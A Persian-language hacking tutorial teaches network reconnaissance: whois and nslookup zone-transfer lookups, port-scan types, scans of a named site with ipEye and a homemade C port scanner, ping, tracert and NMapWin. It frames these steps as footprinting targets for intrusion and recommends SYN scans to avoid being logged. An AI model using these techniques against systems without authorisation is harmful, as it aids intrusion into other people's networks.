توجه کنيد که امروزه سايتهاي مختلفي عمل ثبت domain را انجام ميدهند و براي اينکه در مورد يک سايت خاص (که در واقع يک domain خاص دارد) اطلاعاتي کسب کنيم بايد اطلاعات مربوطه را از آن سايتي بگيريم که ثبت domain را انجام داده است و چون اين کار مشکلي است به جاي استفاده از خود سايتهاي بالايي، از سايتهايي ديگر استفاده ميکنيم که اين کار را براي ما سادهتر ميکنند (خود آن سايتها در نهايت اطلاعاتشان را از سايتهاي اصلي ميگيرند و فقط يک نقش واسط دارند... لازم بهذکر است که ايجاد چنين صفحات وبي زياد هم مشکل نيست.). سايت مورد علاقه من براي کسب اطلاعات سايت زير است:
http://www.samspade.org/t/whois?a=xxxxxxxxx
که بجاي xxxxxxxxx آدرس سايت و يا ip آنرا مينويسيم و آدرس حاصله را در مرورگر خود ميبينيم. مثلا اگر بخواهم در مورد سايت Ksn.4t.comاطلاعاتي بهدست بياورم، مينويسم: شما مي تونيد با کليک روي اين نوشته اطلاعاتشم ببينيد !
http://www.samspade.org/t/whois?a=ksn.4t.com
ملاحظه ميکنيد که اطلاعات زيادي در مورد اين سايت را به اين طريق ميتوان بهدست آورد. اطلاعاتي درمورد آدرس ISP ، شخصي که بهعنوان Admin کار ثبت را انجام داده است و ... البته باز هم نميتوان در مورد صحت و سقم آن اظهارنظر قطعي داشت.
تعدادي از مهمترين اطلاعات را در قسمت DNS Servers يا Domain servers (که در اين مثال در آخر قرار دارد) ميبينيد. بعدا در مورد اين آدرسها توضيح خواهم داد ولي فعلا ميگم که به کمک همين چند آدرسي که در آخر بهدست آورديم به کمک دستوري به نام nslookup ميتوان اطلاعات با ارزشتري بهدست آورد که بهزودي ياد ميگيريد.
----------------------------------------------------------------------------------------------------------------------------------
چگونگي استفاده از nslookup
وقتي که DNS Server يک سايت را بهدست آورده باشيم (از طريق whois )، به کمک دستور nslookup ميتوان اطلاعاتي اضافي در مورد آن سايت پيدا کرد. طريقه استفاده اين دستور به صورت زير است:
فرض کنيد که من ميخواهم از Domain Server سايت خودم اطلاعاتي بهدست بيارم. اگر به اين سايت whois کنم، ميبينم که دوتا Name Server يا DNS Server دارد:
s1.ksn.com
s2.ksn.com
حالا ديگر آدرس DNS Server مربوط به ksn.com را دارم و ميتوانم شروع کنم:
?- دستور nslookup را در command prompt نوشته و اجرا ميکنم:
C:>nslookup
و نتايج را ميبينم:
*** Can't find server name for address 192.168.20.3: Non-exi...
*** Can't find server name for address 192.168.20.1: Non-exi...
*** Default servers are not available
Default Server: UnKnown
Address: 192.168.20.3
علامت > يعني شما ميتوانيد دستورات را تايپ کنيد.
?- در جلوي علامت < دستور زير را تايپ ميکنيم:
> server dns_server
که به جاي dns_server بايد آدرس DNS Server سايت موردنظر را بنويسم. پس براي سايت ksn.com ميشود:
> server s1.ksn.com
و جواب ميشنوم:
Default Server: s1.ksn.com
Address: 63.148.227.63
اگر در اين مرحله پيغام خطا ميگيريد، بايد دوباره اين دستور را تايپ کنيد و نيز ميتوانيد از DNS Server دومي که در whois براي بهدست آورديم ، استفاده کنيم.
?- دستور زير را تايپ کنيد:
> set type=any
?- حالا به کمک دستور زير اطلاعات را بهدست ميآوريم:
> ls -d site_name .
که براي Ksn.4t.com ميشود:
>ls -d Ksn.4t.com.
دقت کنيد که بعد از اسم سايت يک نقطه (dot) گذاشتهام، شما هم بهتر است اينطوري بنويسيد.
نتايج زير حاصل ميشود:
[s1.ksn.com]
Ksn.4t.com. SOA s1.ksn.com admin.ksn.com.
(2002070412 3600 600 86400 3600)
Ksn.4t.com. A 63.148.227.65
Ksn.4t.com. NS s1.ksn.com
Ksn.4t.com. NS s2.ksn.com
Ksn.4t.com. MX 10 mail.ksn.com
Ksn.4t.com. MX 15 ksn.com
ftp CNAME ksn.com
mail A 63.148.227.65
www CNAME ksn.com
Ksn.4t.com. SOA s1.ksn.com admin.ksn.com.
(2002070412 3600 600 86400 3600)
بعدا در مورد کاربرد تکتک اينها صحبت خواهم کرد ولي بعضي از آنها همينطوري هم اطلاعات واضحي دارند.
?- دستور exit را مقابل < تايپ کرده و از nslookup خارج ميشويم.
شما براي تمرين همين کار را در مورد سايت neda.net.ir انجام دهيد. فقط رو سايت من نکنيد در پيت خراب ميشه !
? تقسيمبندي پورتها از روي شماره آنها
?- پورتهاي 0 تا 1023 :
مشهورترين پورتها هستند و معمولا هرکدام براي يک سرويس خاص استفاده ميشود. با تعدادي از اين پورتها در جلسات قبل آشنا شدهايد.
?- پورتهاي 1024 تا 49151 :
اين سري از پورتها مشخصا با هيچيک از سرويسهاي اينترنتي مرتبط نيستند بلکه وقتي که با يک ابزار شبکه مانند مرورگر اينترنت(مثل Internet Explore يا Netscape Navigator )، نرمافزار ارسال و دريافت E-mail (مثل Outlook يا Edura )، نرمافزارهاي FTP (مثل WS-FTP يا Cute-FTP ) کار ميکنيد، يکي از اين پورتها به صورت random باز شده و يک ارتباط با سرور (با توجه بهنوع سرويس اينترنتي که ميدهد که يکي از پورتهاي 0 تا 1023 است) برقرار شده و دادهها ارسال و دريافت ميشوند. يعني پورت شما يکي از پورتهاي اين قسمت است و پورت سرور يکي از پورتهاي بالايي.اين سري پورتها را پورتهاي register شده هم ميگويند.
?- پورتهاي 49152 تا 65535 :
اين سري از پورتها بهندرت استفاده ميشوند. کاربرد اساسي آنها براي يک سري سرويسهاي خاص اينترنتي است و يا توسط trojanها (که براي Hack کردن کامپيوتر است) است. البته خيلي از trojanهاي معروف از پورتهاي رديف ? هم استفاده ميکنند و اين تقسيمبنديها هميشه برقرار نيست و بههمين علت است که گاهي پورتها را به دودسته زير 1024 و بالاي 1024 تقسيم ميکنند.
TCP و UDP چيست؟
مدل TCP/IP که براي ارتباط اينترنتي بهکار ميرود، ميتوان به لايههاي مختلفي تقسيمبندي کرد که بعدا بيشتر توضيح ميدم، اما يکي از اين لايهها، لايه ارتباط host2host است که خود شامل دو پروتکل است به نامهاي TCP و UDP :
?- (TCP (Transmission Control Protocol :
اين پروتکل قويتر و قابل اعتمادتر است و اصولا پروتکل مهمتري نسبت به UDP محسوب ميشود. اين پروتکل توانايي بازبيني بستههاو کنترل خطا را هم دارد.
?- (UDP (User Datagram Protocol :
اين پروتکل براي کاهش overflow طراحي شده است و در خيلي از موارد وابسته به TCP است.
نکته مهم اين است که وقتي با يک پورت خاص روي يک کامپيوتر ديگر ارتباط برقرار ميکنيم، اين ارتباط ميتواند از نوع TCP يا UDP باشد. بنابراين وقتي ميخواهيم يک کامپيوتر خاصي را از نظر پورتها بررسي کنيم، هردو بايد بررسي شود.
معمولترين Scanning ها کدامند؟
دو نوع معمول Scanning وجود دارد:
?- IP Scanning :
فرض کنيد که شما يک سري IP مربوط به يک ISP خاص را داريد و ميخواهيد بدانيد که در اين لحظه کدامها فعال (up) هستند تا فقط آنها را بررسي کنيد و نه همه را. اين موضوع را بعدا توضيح ميدم ( اين کار معمولا موقعي پيش ميآيد که قرار است کلاينت هک کنيد و مهم نيست چه کسي باشد )
?- Port Scanning :
در اين حالت ما IP يا IPهاي مورد نظر را انتخاب کردهايم و حالا ميخواهيم بدانيم که کدام پورتها روي آن کامپيوترها باز است. اين کار به کمک نرمافزارهاي خاصي انجام ميشود که مبحث امروز ماست.
چگونه يک ارتباط TCP برقرار ميشود که بگوييم فلان پورت باز است يا نه؟
براي اينکه تعيين کنيم که يک پورت روي يک سرور باز است يا نه، معمولا بايد يک TCP connect scan انجام دهيم. اول اين را بگم که Port Scanning انواع مختلف دارد که فعلا ما نوع TCP connect را مدنظر داريم. اين نوع اسکن سه مرحله دارد که به آن TCP's 3-way handshakeميگويند:
?- اول کامپيوتر ما به سمت سرور يک SYN packet ميفرستد که به معني درخواست اتصال است.
?- اگر سرور اين درخواست را قبول کند، در مرحله دوم سرور به سمت ما يک SYN/ACK packet ميفرستد.
?- در مرحله آخر کامپيوتر ما يک ACK packet به سمت سرور ميفرستد.
نوع ديگري از پورت اسکن TCP SYN scan نام دارد. با توجه به اينکه معمولا اگر پورت اسکن به روش بالا (TCP connect scan) انجام دهيم، معمولا در سرور اين اتصال ذخيره خواهد شد و بعدا ميتواند ما را رديابي کنند، به جاي آن ميتوان از TCP SYN scan استفاده کرد. در اين نوع اسکن، مراحل ? و ? از بالا انجام ميشود ولي مرحله ? نه! اگر در مرحله ? به ما يک SYN/ACK برسد، آن پورت باز است و اگر يک RST/ACK برسد، يعني بسته است.
انواع ديگري از پورت اسکنينگ هم وجود دارد مثل UDP scan, TCP Window scan, TCP ACK scan, TCP Null, TCP Xmas Tree, TCP FIN Scan
چگونه ميتوان عمل Port scanning را انجام داد؟
در تمام مطالبي که تا اين مرحله گفتهام سعي کردهام که فقط از ابزارهاي موجود در ويندوز استفاده کنم و هيچ ابزار ديگري بهکار نبرم، اما در مبحث پورت اسکنينگ چون هيچ ابزاري در ويندوز براي اين کار نيست، بهناچار بايد يک سري برنامه را از اينترنت داونلود کنيد. (توجه داشته باشيد که فعلا حرفي از لينوکس نزدهام و سعي ميکنم فعلا هيچ بحثي را در مورد آن مطرح نکنم)
براي Port Scanning ميتوان از ابزارهاي مختلفي استفاده کرد که اکثرا براي لينوکس طراحي شدهاند، اما مهمترين پورت اسکنرها براي ويندوز عبارتند از:
?- نرمافزار NMapWin v1.3.0 :
نسخه گرافيکي و مخصوص ويندوز براي nmap است (nmap در لينوکس استفاده ميشود). nmap از کاملترين ابزارهايي است که هکرها استفاده ميکنند که علاوه بر توانايي انواع پورت اسکنينگها، ميتواند کارهاي بسياري چون تشخيص سيستمعامل سرور و ... را انجام دهد. اين ابزار را بعدا توضيح خواهم داد ولي فعلا براي کار ما بيش از حد کامله ;-)
?- NetScanTools Pro 2000 :
اين هم از بهترينهاست ولي چون پولي است به جاي داونلود بايد در CD هايي که در بازار هست پيدايش کنيد.
?- WinScan :
براي اسکن کردن TCP (ونه UDP) ميتوانيد از آن استفاده کنيد. من زياد ازش خوشم نيومد.
?- ipEye v1.2 :
من در اين درس از اين نرمافزار استفاده خواهم کرد، براي داونلود آن ميتوانيد به سايت http://www.ntsecurity.nu/ مراجعه کنيد يا مستقيما با کليک روي اين لينک آن را داونلود کنيد. لازم است بگويم که اين نرمافزار فقط در ويندوز ???? و xp کار ميکند و نيز در يک بار اجرا فقط يک ip را ميتواند تست کند. ضمنا فقط TCP را تست ميکند.
چگونه از ipEye براي پورت اسکنينگ استفاده کنيم؟
با تايپ ipEye در command prompt اين نتايج ظاهر ميشود:
ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
- http://ntsecurity.nu/toolbox/ipeye/
Error: Too few parameters.
Usage:
ipEye -p [optional parameters]
ipEye -p
[optional parameters]
is one of the following:
-syn = SYN scan
-fin = FIN scan
-null = Null scan
-xmas = Xmas scan>br>
(note: FIN, Null and Xmas scans don't work against Windows systems.
[optional parameters] are selected from the following:
-sip = source IP for the scan
-sp = source port for the scan
-d = delay between scanned ports in milliseconds
(default set to 750 ms)
فرض کنيد که ميخواهيم سايت سازين را از نظر پورتها از پورت ? تا ??? تست کنيم. اول بايد ip آن را به دست بياوريم که ميشود، 63.148.227.65 و حالا به کمک دستور زير آن را بررسي ميکنيم:
ipeye 63.148.227.65 -syn -p 1 200
دقت کنيد که 63.148.227.65 عدد ip سازين، syn- يعني SYN SCAN و p 1 200- يعني تست از پورت ? تا ??? باشد. البته پارامترهاي ديگري را هم ميشود ست کرد که فعلا به درد ما نميخورد. با اجراي اين دستور به نتايج زير ميرسيم:
ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
- http://ntsecurity.nu/toolbox/ipeye/
1-20 [drop]
21 [open]
22 [closed or reject]
23-24 [drop]
25 [open]
26-52 [drop]
53 [open]
54-79 [drop]
80 [open]
81-109 [drop]
110 [open]
111-142 [drop]
143 [open]
144-200 [drop]
201-65535 [not scanned]
Closed يعني کامپيوتر در آن طرف هست ولي به پورت گوش نميدهد، Reject يعني اينکه يک firewall هست که اجازه اتصال به آن پورت را نميدهد، Drop يعني اينکه يک firewall همهچيز را پس ميزند و يا اصلا کامپيوتري اونور نيست، Open هم که يعني باز.
در مورد سازين ميبينيد که از بين پورتهاي ? تا ??? ، پورتهاي ??، ??، ??، ??، ???، ??? باز است و ميتوان به آنها telnet کرد. دقت کنيد که تا تمام پورتهايي که مشخص شده، تست نشده است، هيچ نتيجهاي نشان داده نميشود و يهکم صبر ميخواد.
يادآوري :
قبلا گفتم که براي اينکه هکر خوبي بشيد، زبان C را بايد ياد بگيريد. امروز اولين برنامه اينترنتي خود را به زبان C شروع ميکنيم.برنامهاي که امروز مينويسيم، يک پورت اسکنر ساده (Simple Port Scanner) است که acw_spscan.exe نام دارد. acw يعني Artawill Commandline Windows و spscan يعني Simple Port Scanner. من سورس اين برنامه را با Borland C++ 5.02 کامپايل کردم ولي فکر کنم روي هر نوع کامپايلر C ويندوز کار کند.
يک سري نکات در مورد هر برنامهاي که با C براي ويندوز خواهم نوشت هست که فقط امروز ميگم و بعدا ديگه اشاره نخواهم کرد.
?- هر برنامهاي که من مينويسم، شامل دو فايل است که بايد داونلود کنيد: فايل اصلي که پسوند C يا CPP دارد و يک فايل به يکي از نامهاي acw_sock.h يا agw_sock.h يا acu_sock.h ويا axu_sock.h که با توجه به نوع سيستمعامل (ويندوز يا يونيکس) و نوع ظاهر برنامه (خط فرمان يا گرافيکي) يکي از اين چهارتا خواهد بود. اگر برنامه براي ويندوز نوشته شده است، بايد قبل از کامپايل نهايي فايل WS2_32.LIB را هم به پروژه اضافه کنيد.
?- هر بار که برنامه جديدي خواهم نوشت فايلي که پسوند h دارد، کامل و کاملتر ميشود، پس هر وقت يک فايل جديد C يا CPP داونلود ميکنيد، فايل h مربوطه را هم داونلود کنيد.
?- کامپايلر مورد استفاده در برنامههاي ويندوز Borland C++ 5.02 است. اگر از کامپايلر ديگري استفاده ميکنيد، ممکن است لازم باشد که تغييراتي اعمال کنيد.
?- سورس تمام توابع و برنامهها مشمول کپي رايت است ولي استفاده از توابع در برنامههايتان در صورت عدم اعمال تغييرات در سورس بلامانع است. – اينه !
درباره برنامه Artawill Command-prompt Windows - Simple Prot Scanner = acw_spscan
برنامه acw_spscan.exe عمل پورت اسکنينگ را به صورت tcp و udp انجام ميدهد. همانطوري که از نامش پيداست، براي ويندوز و بهصورت خط فرمان عمل ميکند.
داونلود فايلاجرايي ( acw_spscan.exe )
داونلود فايل برنامه ( acw_spscan.cpp )
داونلود فايل هدر ( acw_sock.h )
اگر در command prompt تايپ کنيد: acw_spscan ،خطوط زير چاپ ميشود:
Artawill Command-line Windows SimplePortScanner (acw_spscan.exe) v1.0
Programmed by KsN , ArtaWill.com
Usage: acw_spscan []
بنابراين مثلا اگر بخواهم سايت سازين را (که ip آن 63.148.227.65 است) براي پورتهاي ?? تا ?? به صورت tcp اسکن کنم، بايد بنويسم:
acw_spscan 63.148.227.65 20 30 tcp
و جواب ميشنوم:
Artawill Command-line Windows SimplePortScanner (acw_spscan.exe) v1.0
Programmed by KsN, ArtaWill.com
>TCP
[63.148.227.65] TCP 21 : OPEN
[63.148.227.65] TCP 25 : OPEN
Simple Port Scanner End.
که نشان ميدهد، پورتهاي ?? و ?? باز است.
بررسي سورس برنامه
من براي راحتي کار برنامهنويسي شبکه، يک سري تابع تعريف کرده و آنها را در فايل acw_sock.h قرار دادهام که در برنامه اصلي آن را include ميکنم. حال به بررسي توابع مورد استفاده در برنامه امروز ميپردازم ( اگر خواهان اطلاعات بيشتري هستيد، سورس اين توابع را از فايل acw_sock.h بخوانيد ):
?- (int arta_win_LoadWinsock(char, char ==>
در برنامهنويسي ويندوز قبل از استفاده از سوکت(socket)، بايد WinSock را لود کرد که من اين کار را با اين تابع انجام ميدهم. اگر بپرسيد سوکت چيست، ميگويم سوکت ارتباطي است از نوع TCP/IP که از پورت خاصي از يک کامپيوتر به سوي يک پورت خاص از يک کامپيوتر ديگر براي رد و بدل کردن دادهها ايجاد ميشود. کل برنامهنويسي شبکه به کمک C با استفاده از سوکتهاست.
if(arta_win_LoadWinsock(2,0)==-1)
arta_commandline_win_DieWithError("ERR: Cannot load WinSock!");
دو خط بالا براي لودکردن WinSock ورژن 2.0 بهکار ميرود.
?- (void arta_win_CleanWinsock(void ==>
در آخر برنامه بايد WinSockي را که با دستور بالا ايجاد کردهايم، بهکمک دستور اين قسمت ببنديم:
arta_win_CleanWinsock();
?- (int arta_win_CreateTcpSocket(void ==>
اين تابع يک سوکت از نوع tcp ايجاد ميکند.
if((sock=arta_win_CreateTcpSocket())==-1)
arta_commandline_win_DieWithError("ERR: Cannot Create Socket!");
دو خط بالا براي ايجاد يک سوکت tcp بهکار ميرود.
?- (int arta_win_CreateUdpSocket(void ==>
اين تابع يک سوکت از نوع udp ايجاد ميکند.
if((sock=arta_win_CreateUdpSocket())==-1)
arta_commandline_win_DieWithError("ERR: Cannot Create Socket!");
دو خط بالا براي ايجاد يک سوکت udp بهکار ميرود.
?- (void arta_win_CloseSocket(int ==>
اين تابع، سوکتي را که با يکي از دو دستور بالا ايجاد کردهايم، ميبندد.
arta_win_CloseSocket(sock);
?- void arta_win_CreateServerAddressStructure
(* struct sockaddr_in *, unsigned short, char ) ==>
اين تابع اطلاعات لازم براي برقراري اتصال را مانند IP, Port ميگيرد و در يک structure مخصوص از نوع sockaddr_in قرار ميدهد. اين structure در توابع بعدي بهکار ميرود.
arta_win_CreateServerAddressStructure(&addr,port,IP);
?- (* int arta_win_EstablishTcpSocketConnection(int, struct sockaddr_in ==>
اين تابع sock (که از تابعهاي ? يا ? بهدست آمده) و addr را (که از تابع ? حاصل شده) ميگيرد و يک ارتباط واقعي tcp تشکيل ميدهد. اگر ارتباط بهوجود آمد، پورت باز است وگرنه بسته است.
if(arta_win_EstablishTcpSocketConnection(sock, &addr)==-1){
....
}
?- (* int arta_win_EstablishUdpSocketConnection(int, struct sockaddr_in ==>
اين تابع sock (که از تابعهاي ? يا ? بهدست آمده) و addr را (که از تابع ? حاصل شده) ميگيرد و يک ارتباط واقعي udp تشکيل ميدهد. اگر ارتباط بهوجود آمد، پورت باز است وگرنه بسته است.
if(arta_win_EstablishUdpSocketConnection(sock, &addr)==-1){
....
}
حالا يک توضيح کلي ميدم:
اولين سطرهاي برنامه را بررسي ميکنم
/* An ArtaWill Production - copyright(c) ArtaWill.com */
/* Programmed by: - KsN Hacker */
/* This Source code and its Functions can be used - but no .... */
/* Funcions source or code can be done ! */
#include /* for printf(), fprintf() */
#include /* for exit() */
#include /* for strings */
#include "acw_sock.h"
void main(int argc, char *argv[])
{
struct sockaddr_in addr;
char *IP;
int sock;
int port;
int startport, endport;
int tcp_udp_both=1;
arta_commandline_win_StartMessage("SimplePortScanner ......");
if ((argc != 4) && (argc != 5)) /* Test for correct ...... */
{
arta_commandline_win_DieWithError("Usage: acw_spscan []n");
exit(1);
}
IP = argv[1];
startport = atoi(argv[2]);
endport = atoi(argv[3]);
if(argc==5){
if(stricmp(argv[4],"udp")==0){tcp_udp_both=2;}
else if (stricmp(argv[4],"both")==0){tcp_udp_both=3;}
}
if(arta_win_LoadWinsock(2,0)==-1)
arta_commandline_win_DieWithError("ERR: Cannot load WinSock!");
اوايل برنامه يهسري توضيحات
بعدش يک سري هدر (header) را include کردهام از جمله acw_sock.h را
بعدش main شروع ميشود و يک سري تعريف متغير داريم که به نوع اين متغير ها دقت کنيد.
بعد از روي ورودي خط فرمان، متغيرها ست ميشوند.
دو سطر آخر هم يک WinSock لود ميکند.
حالا ادامه:
if(tcp_udp_both!=2){
puts(">TCP ");
for(port=startport;port<=endport;port++){
printf(" [%s] TCP %5d : Testing... ",IP,port);
if((sock=arta_win_CreateTcpSocket())==-1)
arta_commandline_win_DieWithError("ERR: Cannot Crea....");
arta_win_CreateServerAddressStructure(&addr,port,IP);
if(arta_win_EstablishTcpSocketConnection(sock, &addr)==-1){
printf("bbbbbbbbbbbbbbbbbbb........");
}
else{
printf("bbbbbbbbbbb");
printf("OPEN n");
}
arta_win_CloseSocket(sock);
}
}
اگر قرار باشد که tcp چک شود، اين خطوط اجرا ميشوند. در اين سطرها يک اتصال tcp خاص بايد ايجاد شود و اگر اين عمل موفق بود، آن پورت باز است.
حالا ادامه برنامه:
if(tcp_udp_both!=1){
puts(">UDP ");
for(port=startport;port<=endport;port++){
printf(" [%s] UDP %5d : Testing... ",IP,port);
if((sock=arta_win_CreateUdpSocket())==-1)
arta_commandline_win_DieWithError("ERR: Cannot Cre....!");
arta_win_CreateServerAddressStructure(&addr,port,IP);
if(arta_win_EstablishUdpSocketConnection(sock, &addr)==-1){
printf("bbbbbbbbbbbbbbbbbbbbbb.....");
}
else{
printf("bbbbbbbbbbb");
printf("OPEN n");
}
arta_win_CloseSocket(sock);
}
}
همان کارها را ولي اينبار براي udp انجام ميدهد.
و حالا آخر برنامه:
puts(" n");
arta_commandline_win_EndMessage("Simple Port Scanner");
arta_win_CloseSocket(sock);
arta_win_CleanWinsock();
exit(0);
}
در اينجا پيغام انتهايي چاپ شده و سوکت بسته ميشود.
? ادامه بحث whois
قبلا در مورد ip whois و dns whois صحبت کردم. بحث dns whois (کسب اطلاعات در مورد يک domain خاص) رو ادامه ميدم.
در درس قبلي از سايت SamSpade استفاده کردم. اگر اين whois رو تست کرده باشيد، ميدانيد که براي يک سري از domain (دامنه) ها، جواب نميدهد. مثال آن سايتهايي است که داراي دامنه جغرافيايي مثلا ايران هستند، در مورد دامنههاي جغرافيايي ايران بايد گفت که به ir. ختم ميشوند ( مثلا: neda.net.ir ). مثال ديگري که در whois سايت SamSpade کار نميکند، تعدادي از دامنههاي org , .net , .com. هستند که در internic.net ثبت نشدهاند، بلکه در domainpeople.com ثبت شدهاند ( مثلا sanjesh.org ). چند سال پيش ثبت domain هايي که در گروه org, net, com بودند، مختص به internic.net بود ولي الان ديگر اينطور نيست.
کاري که شما بايد براي whois کردن بايد انجام دهيد، توجه به نوع آن domain است که از نوع com است يا ir است يا biz است و ... بعد از آن از يکي از سايتهاي زير استفاده کنيد :
?- internic.net :
براي edu , org , net , com عالي است. براي museum , int , info , coop , biz , arpa, aero هم ميتواند استفاده شود.
صفحه وب مربوطه عبارت است از http://www.internic.net/whois.html
يا ميتوانيد مستقيما در مرورگر بنويسيد:
http://www.internic.net/cgi/whois?type=domain&whois_nic=xxxxxxxx که بهجاي xxxxxxxx مثلا بايد بنويسيد: ksn.com
?- nic.ir :
براي ir استفاده ميشود.
صفحه وب مربوطه عبارت است از /http://whois.nic.ir
?- http://www.tv/ :
براي cc , info , biz , tv عالي است.
صفحه وب مربوطه عبارت است از /http://www.tv
يا ميتوانيد مستقيما در مرورگر بنويسيد:
http://www.tv/en-def-8e33e8cf5e3c/cgi-bin/whois.cgi?domain=yyyyyy&tld=zzzz که اگر بخواهم مثلا hack.tv را whois کنم بهجاي yyyyy بايد بنويسيد hack و به جاي zzzz بايد بنويسيد tv
?- domainpeople.com :
براي name , biz , info , org , net , com عالي است.
صفحه وب مربوطه عبارت است از /http://whois.domainpeople.com
همانطور که ملاحظه ميفرماييد، org , net , com در ? و ? مشترک است. علت آن است که بعضيها در اولي و بعضيها در چهارمي ثبت ميشوند ولي براي whois کردن فرقي نميکنه که شما از اولي استفاده کنيد يا چهارمي چون همديگر رو ساپورت ميکنند.
ping چيست ؟
ping دستوري است که مشخص ميکند که آيا يک کامپيوتر خاص که ما ip يا domain آن را ميدانيم، روشن و فعال (Active) هست يا نه. و اينکه اگر فعال باشد مدت زمان رسيدن بستههاي tcp/ip از آن کامپيوتر به کامپيوتر ما چقدر است.
کاربرد اين دستور به صورت زير است:
ping ip-or-domain
که به جاي ip-or-domain بايد شماره ip و يا domain آن(اگر داشته باشد) را ميگذاريم.
مثلا ping KsN.com را در command prompt تايپ کردم و به نتايج زير رسيدم :
Pinging ksn.com [63.148.227.65] with 32 bytes of data:
Reply from 63.148.227.65: bytes=32 time=1402ms TTL=105
Reply from 63.148.227.65: bytes=32 time=941ms TTL=105
Reply from 63.148.227.65: bytes=32 time=981ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105
Ping statistics for 63.148.227.65:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 851ms, Maximum = 1402ms, Average = 1043ms
اين نتايج نشان ميدهد که ksn.com فعال است.
حالا به کامپيوتري با ip شماره 63.148.227.65 (که همان ksn.com است)، ping ميکنم. نتايج همان است فقط با تغييراتي در سطر اول. (البته time که معناي مدت زمان رسيدن پکت را ميدهد، با توجه به ترافيک شبکه، کم و زياد خواهد شد). براي ping کردن به اين ip ، دستور 63.148.227.65 ping را صادر ميکنم :
Pinging 63.148.227.65 with 32 bytes of data:
Reply from 63.148.227.65: bytes=32 time=861ms TTL=105
Reply from 63.148.227.65: bytes=32 time=852ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105
Reply from 63.148.227.65: bytes=32 time=881ms TTL=105
Ping statistics for 63.148.227.65:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 851ms, Maximum = 881ms, Average = 861ms
فرض کنيد که به يک ip که فعال نيست، ping کنيم:
Pinging 217.66.196.1 with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 217.66.196.1:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
که نشان ميدهد که آن ip در آن لحظه فعال نيست.
البته تمام مطالبي که در بالا ذکر شد، در حالتي است که مستقيما به اينترنت وصل شدهايد و يا اگر از طريق شبکه محلي به اينترنت وصل هستيد، شبکه شما به درستي پيکربندي شده باشد. اصولا ping يکي از بهترين دستورات براي پيدا کردن ايراد در شبکه است.
tracert چيست ؟
tracert ( در يونيکس ميشود traceroute ) ابزاري است که نشان ميدهد که يک packet اطلاعاتي از کامپيوتر شما چه مسيري را طي ميکند و از چه کامپيوترهايي ميگذرد تا به يک مقصد خاص برسد. مقصد را ما مشخص ميکنيم و معمولا همان کامپيوتري است که داريم footprinting ميکنيم.
کاربرد اين دستور به صورت زير است:
tracert ip-or-domain
مثلا ميخواهم ببينم که از چه کامپيوترهايي بايد رد شويم تا به ksn.com برسيم. براي اينکار ميتوان از يکي از دستورهاي زير استفاده کرد:
tracert ksn.com
tracert 63.148.227.65
به نتيجه زير رسيدم:
Tracing route to ksn.com [63.148.227.65]
over a maximum of 30 hops:
1 160 ms 160 ms 160 ms 217.218.84.3
2 381 ms 691 ms 1772 ms 217.218.84.5
3 * * 2324 ms 217.218.77.1
4 201 ms 1101 ms 180 ms 217.218.0.252
5 341 ms 220 ms 180 ms 217.218.0.2
6 1993 ms 180 ms 181 ms 217.218.158.41
7 180 ms 160 ms 160 ms 195.146.63.101
8 2824 ms * * 195.146.32.134
9 1472 ms 1463 ms 871 ms 195.146.33.73
10 791 ms 841 ms 811 ms if-1....eglobe.net [207.45.218.161]
11 1692 ms * 2654 ms if-4-....eglobe.net [207.45.222.77]
12 1282 ms 891 ms 1052 ms if-1-....globe.net [207.45.220.245]
13 902 ms 931 ms 881 ms if-15.....globe.net [66.110.8.134]
14 931 ms 861 ms 871 ms if-8-....leglobe.net [64.86.83.174]
15 901 ms 841 ms 852 ms if-5-.....globe.net [207.45.223.62]
16 841 ms 862 ms 851 ms pos6-.....vel3.net [209.0.227.33]
17 841 ms 842 ms 941 ms so-4-1.....vel3.net [209.247.10.205]
18 882 ms 931 ms 851 ms so-0-1....vel3.net [209.247.11.197]
19 871 ms 891 ms 951 ms gige9....vel3.net [209.247.11.210]
20 1011 ms 851 ms 902 ms unknown.Level3.net [63.208.0.94]
21 852 ms * 882 ms 64.156.25.74
22 961 ms 942 ms 841 ms 63.148.227.65
Trace complete.
اين نتايج نشان ميدهد که بايد از ?? کامپيوتر بگذرم تا به ksn.com برسم. اين اطلاعات همانطور که بعدا خواهيد ديد، حاوي اطلاعات زيادي براي پيدا کردن فايروالها و ... است. (بعضي سطرها رو کوتاه کردم و بهجاش .... گذاشتم)
tracert داراي تعدادي switch است که دوتاش رو توضيح ميدم:
d- ==>
با استفاده از اين سويچ در نتايج حاصله فقط ip ها نمايش داده ميشود.
مثلا مينويسيم: tracert ksn.com -d
h max-hops- ==>
حداکثر تعداد گامها را تعيين ميکند. حالت پيشفرض ?? است.
مثلا مينويسيم: tracert ksn.com -h 50
از اين دستور بعدا بسيار استفاده خواهيم کرد.
معرفي nmap و NMapWin
اگر بخواهيد مهمترين ابزاري را که يک هکر براي footprinting استفاده ميکند بدانيد، آن نرمافزار nmap خواهد بود که براي سيستمهاي لينوکس و يونيکس طراحي شده است. براي هکرهاي تازهکار که سيستمعامل ويندوز را به کار ميبرند، نسخه گرافيکي و تحت ويندوزي طراحي شده است که NMapWin نام دارد و همان امکانات را فراهم ميآورد. بحث اين جلسه درباره اين نرمافزار است. اندازه برنامه 6.18 مگابايت است و اگر اتصالتان dial-up است، کمي طول خواهد کشيد. ضمنا توجه کنيد که اين برنامه مخصوص ويندوز ???? و xp است.
اين نرمافزار مجموعه ابزارهاي footprinting مثل پورت اسکن، آيپي اسکن، تشخيص سيستمعامل کامپيوتر مورد نظر (OS detection) و ... را گرد هم آورده است
بررسي ظاهر برنامه
شکل ظاهري برنامه چهار قسمت دارد:
?- Network Section :
بالاترين قسمت پنجره برنامه است که محلي براي ورود ip يا ip ها دارد به نام Host. بعد از وارد کردن ip و تنظيم کردن پارامترها، دکمه Scan را کليک ميکنيم تا کار اسکن شروع شود.
